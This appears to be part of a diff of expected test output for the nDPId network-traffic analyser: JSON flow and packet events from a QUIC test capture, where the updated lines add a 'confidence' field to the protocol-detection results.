 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432907578,"flow_last_seen":1621432907578,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"98.251.203.81","src_port":43427,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00629{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1621433005013,"flow_last_seen":1621433005304,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"168.78.153.39","src_port":35124,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433096272,"flow_last_seen":1621433096272,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":62818,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02310{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1621433096272,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433096272,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+xxAAH4RF+uokEAFcfqJ8\/ViAbsFTmV5zf8AAB0InVNfXfhBloQANwAYYxPxefYKsSfYBnNv1ogsVtvxp+5D0ZV\/hOY9nIpSROAI1ZGm2\/N1AX52ghSODygwpwixzphE\/Zx4PU\/J05Jihihf0HSLIm8bvq1I4lsCPEN84oOzz93N2RNW4AsTQ126TJRbLg+\/OXaDSNcEv\/431bFF8tgqRZ\/fSgX8JysNc3KPA0qWL2Lk3BVQJPsXIJEu279PpzYHBZ9j8jr+MI6zCBxYsOIqbCcGrJg7V4pGpqZanmc\/ej\/n3DeFkX7FR0rIL4URy2ACi55eZKyE\/cY\/+hGES0KNpvEuqZP0W6JB1GsnUf4nno1645JeNNQ40sWdwbJM93i20DxzCA2IHAqqDjKl7kwPdqZgyd9wwmr9W5oFXYYoiVP9fx50w\/y3HwF4y+xHmrmGKykORvvBujXyroRnjwvJp9k2q78bX9Nyvlbb\/fcJY8pdAcKGU9z25xdLJSOP1tG+gXR\/jGu2H6rUhavGMF5LYRTLRLHp4SbpUUx8jxdCEFUjmqtpUIEIrwm4Z0Hm+uQms\/iJ5w+1UJ2sdLBPKH3CMuMfmQi9NKErYIIwBEWNGQPZhSqFzVRVxsUINfKxs3IjvTnnhraOla+6OE4l1QrgjctRAPGA7S62BByhCMQNGtxvd0byLHL3+HLvfrJ4IQWU+re9yL28JxErUWHasznlYJkI6xctz4\/QfwLD\/upI1HHH3su\/JN\/59+8xaxpgdcd1l2nQp0pyvwyv5U6Wf7RnFfTWkvsE+beNCGvmyezggTvYYVlP3svh2dMR5YCsXGGBkHXD5Al\/bACbEjho74CZPIoyoqlumxFrHIJzc\/NBVqNAjx6GAMbtTyTT9DzAEk0LjnqNCPGHCefcqhja9+\/J1dYX96nmT25GaBsEaG\/rC+3NobsSNBEJakiA8NJIkUAtNh+7e+Q1zXrNjmd8NmSHehchWFhaFYfxnUhrfl0EpT63dRGyufStUHX8IH1M1xkDQCR7MdusL0d8DxstPAiU60cVG6Pwo2zDUTo5ubMxGhOpDHV7R7afYETZMCRo7m4ZNNCrUpt7zoBwup1J4svPg6nbVaI\/m0yq18JHw6AXXYyRID8HHMYm7BT25H0nPZW9IjpdJr3qmbDzc+C1RUeG2FZX3vtkbX1cww+TdfceaPdnmlb8oqte+bT7ih1pGpJbAr5QrtlJ0fJxJALGxPwvaxQt9OZJtzlgIiab41SJVcAVCq2GsiZ42wdCT81IxlQVTSKbH4rfxWIpBOQ2K2fcx5t+Zp\/ZWzBzNSCJHZYT0Yrw\/F\/i5MpM8YmdTShwy7McxVy34xfaZsuGyshTN0NhE1oUwb89fh0YTKyYiGlurNDOZOnGgfEY3re1o6jZ1GhwQ9qS8pljPV8ic6OmyGN3uNl6cnbAJr6m2SeP9AyqqSk1xq6k+NfhHQoeQ0khsYt2zSVuVeE30pVDMVLVpm1OQ7GuqKpKfrgPTEqSQp7+KiYJBgE45ORKunQOL\/cPFO2l8yzljsHT\/3TEL5kTELmyqZtHoUk5kaVnTC2KnmjMSJdqOCe0YoI+ZYBNkv2Qc1l\/Ve5vnSTtpVXPgZSSESjNxCDjPN5u2\/Z4VbQPVJvn\/cvLnv37v4aofPgYXBuu4ppOjhOv+b1CVIy9SClF\/HoAy6eQYGuQjl4dTmHCm2hwqRIzd1UwyH0AmPA5vcXUv8JLzDIYLi6t8TV9fYAP5GDkBiAsP8JBZRXqxfCVEsg4I5l0rc9K50VAdnoSCYqi+WwH8w7xNF4Bf7\/E3sWph1xGreEe2sTWhSoHxGuzKZgP"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433096272,"flow_last_seen":1621433096272,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":62818,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433096272,"flow_last_seen":1621433096272,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":62818,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432925103,"flow_last_seen":1621432925103,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433110371,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"171.182.169.23","src_port":54692,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433110371,"flow_last_seen":1621433110371,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433110371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"125.136.204.4","src_port":56425,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1621433110371,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433110371,"pkt":"AAAAAAAAAAEAdQOrCABFAAViTQVAAH4ReGOokEAFfYjMBNxpAbsFTiPgxP8AAB0I64b6Iq3qYnUAAEU0uyXOGSdM2M9jQQTW8DsUXfqiyZuXJRO+q4Qmsi3Ls5Qr7HY2TrDXBUTOIVmmAHBRjS4fP4\/iytOosBigAE3GS1YbHzV4KTpsNSP39e4Ai\/gNwa+JW6iG+pMEbrvqFzobrQPLaW\/LHhGgdXr9HPIyoZkTeqm4dAslx2tKgtIx+D3ADPfxa1GtgUwgxIFKeLXE5L28gvidFJ5kvOUtEWVi7p1Ct04FJCqOfcTDqWyHNK+CqUqUXBJaar8gIYJl7Adtmv4APrH1W4DdFGHseDk\/eiFm5dmfQmCqHSHBPKfjlASsF\/vx\/dDIlMGRNJVvEUORDhpGyc6KzrwpCkBycpnvcDHT9PXlK1Pxbvka1u8Bb\/RRdl4GhJjum02FvwJAQzMMcjvQQIBXXUnCtqFNSpD+x2LT6UXB+SZ7qVGMl\/t0sECBNEK08pUkCk0VFUho606M2fHuj9LbnZQ2bGNrvbAjmEkMviJQv1BoTAZGNESQTqDEbwUZYlY30qwlBFXqT9WdH2E9DjbH42c0gLLqSkQErQpcDnv3SSVrUT94EWqqkCfDVWO57NKjDmHa\/9gsGDeQQUO53mruFkMe6rXxUCFdLDVpieBe\/WbmjFIiYjT+b4FzvV0xGUDAY6PtgiB6HvKPqKp6fxy1kpVrc+ZsH0+HKMh3jfC1EeH9CHXsXnCW1rsQpJK4+n8CsldKtQaVDkSAqWG\/OgV+UysKdCujrfyCGHfNMSPWkslqqg7s2vLXqrQBO58gohSxIbtaCIYfWJrle40Mot6V+cL54Ya7PHlWtQH\/Ful4v4rOlvCR9PDd2nGpQ3FkgkGPeywwCdeY5sCTYbMMlVuLQJ1oFmyS3u\/zhwjeifqZs579qwIfpeaP1FtY5r+JU0rDJQFD7jOZdftjZf2LgOsGj\/TW2xmygvRQ30KJn7bLRU1w2J0q7tz5rXSOHzMeKm57vqp3aJSFv9vTNxJ+BD5u\/xLLqLMMeKd3yPZj737pE79\/LtTTjm5eJ8jsSmmJueqzLtGilfbTFryRQF8325++2yfVJKrzj0c61X3njJbMRbXWJEiQmoEZWV9TWfn7wTSpOjjQRnHFofPS0wy5fqr\/79EqOgnhI9PoQuUw+VgWrmM8UnMpt6HX7llwMkswjZvYYBxWiZK7SxCUZWVinS8leBxtyiCVvDCRWP+lpTzYWOppDeOpuuR6nJmZFaaTGLcFFPeAKuAVu+nTC0hkldleZKShVNc+\/+rolf\/Gxsw5EKidbPL8HFlBJjaenmfkmZBH3LxN7+OOgk0dXGhmlJ4wgJ21FhusAxJjb4rdo8Ob65\/i1ZqK2DnqWoWzDwD5m4Uu8\/nBbSMW0kQrvJmBY4XN+lhGiBPJsJk96AxOW048eDZfKJYg8Q4WotwapShO9Tb4n7Q5LhKow3wsQkO4tfue14G\/HUzOIzbT2Vd6GbyzGYbP6zeXYMvI\/MobQkwBtMUX8uK0OxAv1Dxr6E1ez++cFwnP4qZm\/N5d3Snzx7Qd6PHVVvdaIKFS5ChMsrskm71TFLKy4FJm65hgjBVyTzsB5o+U2Jtrwl04IuRnmQXivp3vavvqqU\/4e3mekp37TSUP7JrzfA2\/tdw5ycfdyqXP74qiJ7FqCBDCIFZz07WOMSykwdBK8sEwapJgncvO5v8s3K9sHSmwHnUhAmcTcEJWDFYrq8fgJAuluMgxicHkbBHDHTdVhPiEDPwopOcYRyFx6QlMlyoiPrV8enJOOqMFw9m6sR5PA1xxKZEflyuJ3mRTH80kEIdfZNby15\/d"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433110371,"flow_last_seen":1621433110371,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433110371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"125.136.204.4","src_port":56425,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433110371,"flow_last_seen":1621433110371,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433110371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"125.136.204.4","src_port":56425,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433096272,"flow_last_seen":1621433096272,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":62818,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1621433005013,"flow_last_seen":1621433005304,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"168.78.153.39","src_port":35124,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067725,"flow_last_seen":1621433067725,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"117.148.117.30","src_port":51075,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -217,26 +217,26 @@
 00627{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433110371,"flow_last_seen":1621433110371,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"125.136.204.4","src_port":56425,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00623{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433283660,"flow_last_seen":1621433283660,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59622,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1621433283660,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433283660,"pkt":"AAAAAAAAAAEAU0VlCABFAAViM6RAAH4RJaGokEAFmWIcTujmAbsFTq3rwf8AAB0Iz5STt1Y1cC0ANwDFPRNS\/+a+ehucrc3Cy3E4zimx6Se5x9S2Dy\/Gdsrzx5YFrAfk\/P5DuuwrPRCPOU3BXGhgTB5E\/e3sUYmzAEVTAuBYpB\/Z\/1ehiztmkudlkpmIe8TV88KuQZdgMCFwpkxLuaxS1ziTCHLi1IPv4lk79c5Z0ULFtJLLvCInJMRjcd6mMGJScqPLX\/oX54gz8qU\/6Qz4haz6hp+OoT4jjUoHwXKwZdcJIPU1d0Fgj9BSxoZMC3uUZUh6\/nSO1JIplWk20Jn+EdrtXf9IF3Neg2QP7WN48TjKFEWh8rRXUGGVZwXfgyZ4u67st5aDs9WYZrXzKxk1nJVUFJMK02b+yKanwM95M5gyBaP7fEbsz3G93Jc14HIS+TZPmXtQf0GDj7Mvht+3zbNTk\/o4VaawVm8AXrpyWNWavSleSlFtm32amXDcWcXBAXyviKq\/ZxOJHsOe0hRNn8R9DKEAdOiVzWHc7gKLyh2t\/TJ5RZvARNmvpppZ6wGihiLhcw7ZfxEeTZuIMl2vCqdlmdPL9rAcodDnH3cPQgNcH7hxThB++pzk4xpGMH6II4XWKGZRVIss+xX363+BpzZ84mO8AvFYpM2G1yOSewM2tyHJJjvt5tVaanjhIHX91fgLX\/FiKYxmMGxgXGOHydnptpnm23dOt0b9WZvjKRdNovSQvIwMupd1UWFxikqzvsb7A4rsAUyXLWIzvzBBk7394MKzqD+owlnrzPcWgMnz22akkOeqa\/r7Uc1zdnb\/xMYpRLj6j\/VJPcZxgWSF\/P4Qtjjh5xSMS7E0SpcbJG3qGTIvbs9UGrdVGQOvITRNq5BHB25231B8uXSwZZ2OfP4kX6XjlMWXbP+uJQMmZTGglRloO+dA6aqTrTy9krXaEQKMk1DpabL8dpFus+hC79SbtQRB2+q+kl1BPR+TLeqOsYPTKcukPf2WREttP39G\/t9VQQCU\/rrFLKNTWUuaicuTglon\/iwyuggUyLgAJ5TOQSh3AwDysJj81Jj8yy\/XVRc+Ow92NtvThIEXi2BqpMI0pLfvsZgTdjiOUTaj4nR5+SLJt0aFTQqUXp4O4\/J8uybiTqPwgzFfEz23lP4SecnmMrwFjOkjPHhXc3\/7rEUmZh2scM1CaQnd8xqX1Byg\/aXBz51V4uicTZLxtfg75bBVl3kelSzZJu+XqjxdL+n9CzfZbtFpXbsW2S+Q4+jDNeJp4HBqG06R4FxxFevo8pd0keFBmX69U1z3Wq3sokxVvxe8+dpn6prJlOSracYX8yZoELER11iW2n6aiIPlofm1lWs6hUzVqnPotYA\/DykZqsMhurgWD4MoqHtW4DHKc5Bn5KWc\/OJK60z5e9EaP9fvLRfYouPq78UI388ELbk719D+pp1WijPL3R0TEvj7ae26qCBSAEds62fCV+P4XZ5x0eUy1+pBImuibzJy0Qqd7jHkHbgRa8FGmj\/X2+xPfVMG8h0AOMqH9w0rUvMze6gprpf\/7tktIfCTqw2Qj6+Gkt7WnBilpUaFfwjZrooYmfJ0DMITDqenN\/N95DqoILT6NKoG8ZEuXufJTYTBtIQQURklCzYwU+bVBfdZZKhXs38KMloqNck1yXZTWMqx0XcaKtPF38dzgU97G+ewHG\/d4QBFblkENQ59GekuwL0tajlQ1a5yv41R4OjF\/og3TAJBWTrUQFopI3FvTMPDLJkxnep4Xrtt3D9pwmCEDc5Asj6CgulJotykyE2uPE6yOnzV6YWwiNzS7S0bLajRUqyRCV2dgZXZaKJvRpr1CHOH"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433283660,"flow_last_seen":1621433283660,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59622,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433283660,"flow_last_seen":1621433283660,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59622,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433110371,"flow_last_seen":1621433110371,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433300632,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"125.136.204.4","src_port":56425,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433300632,"flow_last_seen":1621433300632,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433300632,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"108.171.138.182","src_port":50552,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1621433300632,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433300632,"pkt":"AAAAAAAAAAEASYHhCABFAAViwQFAAH4RVpKokEAFbKuKtsV4AbsFTpawy\/8AAB0IVc00l\/iOZRgANwACoQTdl\/GOABSj5yQ9HIigBgYJdQCUTNlANM6rqxfD5723bzbrUxaSqL+QgfFYDvSs2HF+3FZE\/TQjSbe4Km8KzftRRJ7WGWJLHVZGU6Pr8JJ9uxzBXyE3XW+2zfcSO0pInvNKKnyglyrBYAu3eLKCvMOF\/lcR22wWFyI78zQm\/U4997pUpU3IeDVTo+1apB0IH0pVnXk0s\/DcR6kAfTOaqckpKyJM+iypk884UqXCF7zKL7SZD4uGN8XS+r+vfGpyWarYF8YuRePoaTXkOZ60muMhm0jUocNqY\/U5XaGTP2BXnULnONu5tCViE2swJ5RpifKQhW0ajmcYyvMPByIkayNlHx+wVxBbD59Qy32KgOOXFf4bk8hLtiTkWyRCqp\/0xL9c3Vfn26VBZY5CoyUtdJBdTk8G94oF5RXnKlsW9RPQGN8PNrTlnxYqCMvKdLymzbrkSaVHd1s6hCDMlvKgPIqlyVPjyv7VwNwgypSmNGQjl2iP6PboGwtXnIpa5ka4IFOHhKblDAPYAGuoR3WhJLHbWPOhkpp2xAZBtIdfGz88WUhh\/fa+5OHfzxRvv\/+98pKocB5KIs+9XaMOM2b4ye775waBhKUHBxzU5chSbpQbjGNQ7UgHntGkQrLxRrgYK30BHeCwGqbB3O3zTGi28fjy0q+DQxv58s+isMuLf4rVml1bN6YCm+6tCQu1csCemJ3W1KsCnXf1iNt4C16k4KuAk4uDPh5S1ikxcI8fbKjrNcKeqP+jUu0A0AQxq4tHOgVeVJ99xXNa0rfYRr+KcbfwK2f3GdLGTda3yUnSVSryfyKJvL2Q+8aLblgUuM6hiD+LekvE\/LlAnbBjLmD8wu4FP2UzL6qUbY58f\/mCvQGgHeRTMEUd4CowlgXPUdhQWeaDlfMLg9lfb0LA68XuyJmqrdq5bG2Bep8ngxyxEBYvezuPAC2Iz5rBy\/4kms+yRvo6kVIbiyCCpXtTDJRUyNmBT3rPW48C4LpJYm\/ICdZMpWdD0UGNtBqPhJE7WKkKOsCkPGnUmiGgDd0pjw+lR7ks28tZEyD2kzjPP7ttelpXI8vPVVoY4UZaApsgyum\/R33EOq89AHxrj6xsKtkVzUTlVCJby5kmDowFpY3WvjB3YKxK7u66vXI2uvpgNuceSN\/6K8VLUZARSSeqan2EPUjPwc8NG39Volpuo\/q6ci4X3xaY\/VIhhzOX0GkrQnDUt567z9VlzQJpCGMRaukTO8AYWCEgkfoe6nxM2l6atxd1xrKaWQ5J1s4Fb+l3ui1owS2vTplZ4RPYsayHMQAz9JTj3HW7PvghKUdzoLY3MmV80zisuPXVZXwU2r9a1f+c1uKlxlSpPR66onFKZZdWkDXHMs5slBPZ3cct6OQSpk1E+HaV0eC8NipyKySEkKnwHTUZdNtCvNWU+DfIdSY+5S7vDR\/kAFS+UkA+axllbFzhbZjbE98MSmiyGeojTXpwHvAETcKEIKQ42DITA7olKjQ58qBoakQBY2QIe2\/X\/a+1Rz3Qpmpf5f\/LIHyY8CJTH6Pguykmu8PZ2YjeCHh9nc4aZI\/D5huo5lq5GzxgnUbuvAghp+1jKsnjdIBsSbRH5Ax5Q1NaysWgoo4eoeRiE97DOBD3dFTT0U9rGH\/b9BWCRjOHVrT0xAYjOVJ9vKjsh\/uQE3RymgcpL9m+XSdoP7juYR415Wg2Oqxg61mfx+maFmAF5FUVl8xb42RdcnTELYsROvNQ5WWEs8jmQMghLxKlLWKQvG8aWjfEzyaOE4xFNVsM"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433300632,"flow_last_seen":1621433300632,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433300632,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"108.171.138.182","src_port":50552,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433300632,"flow_last_seen":1621433300632,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433300632,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"108.171.138.182","src_port":50552,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
